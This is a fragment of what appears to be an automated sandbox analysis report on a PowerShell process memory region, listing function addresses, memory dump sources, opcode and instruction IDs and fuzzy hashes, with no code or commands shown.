                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b790000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a942282f91d899f0bf5be7bce8d17b2f2335eb0836e43777f7ae71f047420138
                                                                                                              • Instruction ID: 778610747368640e849fa01a61cfc4746e228059f73adb1589749c2b8eff2863
                                                                                                              • Opcode Fuzzy Hash: a942282f91d899f0bf5be7bce8d17b2f2335eb0836e43777f7ae71f047420138
                                                                                                              • Instruction Fuzzy Hash: 3EF0E93081878D8FDB46DF6488199E57FA0FF16310F0502ABE85CC70B2DB34A954CB92

                                                                                                              Non-executed Functions

                                                                                                              Function 00007FFD9B7A0EFA Relevance: 1.6, Strings: 1, Instructions: 332COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1780324210.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b790000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 5K_^
                                                                                                              • API String ID: 0-730761414
                                                                                                              • Opcode ID: 1bbfe87f0547676925b865e38db4e09bb7fce7bf58719ddfecc6c6d8cdfef789
                                                                                                              • Instruction ID: 86cc8c2a922004963d28b6ef1775d81d5359f903d387395799a03552e6d40b7c
                                                                                                              • Opcode Fuzzy Hash: 1bbfe87f0547676925b865e38db4e09bb7fce7bf58719ddfecc6c6d8cdfef789
                                                                                                              • Instruction Fuzzy Hash: 28B1A067A0E3DA0FE75397BD58B50D67F60EE5326830A02F7D4C48F0A3EE19650B8661
                                                                                                              Function 00007FFD9B79208D Relevance: .6, Instructions: 647COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1780324210.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b790000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ee05e35a06710c61d7faee24d9c34d9ef81372cfd4b345bb9aa4d56ca24f6ab2
                                                                                                              • Instruction ID: 05fb0b5fe662c451d7576c8d4e731549143b96aa016d9c33fe4b9caf9b83208e
                                                                                                              • Opcode Fuzzy Hash: ee05e35a06710c61d7faee24d9c34d9ef81372cfd4b345bb9aa4d56ca24f6ab2
                                                                                                              • Instruction Fuzzy Hash: 5712B167B0E7D25FE32766EC58B60E53FA0EF5326471E01F7C4C58A0B3E919294A8361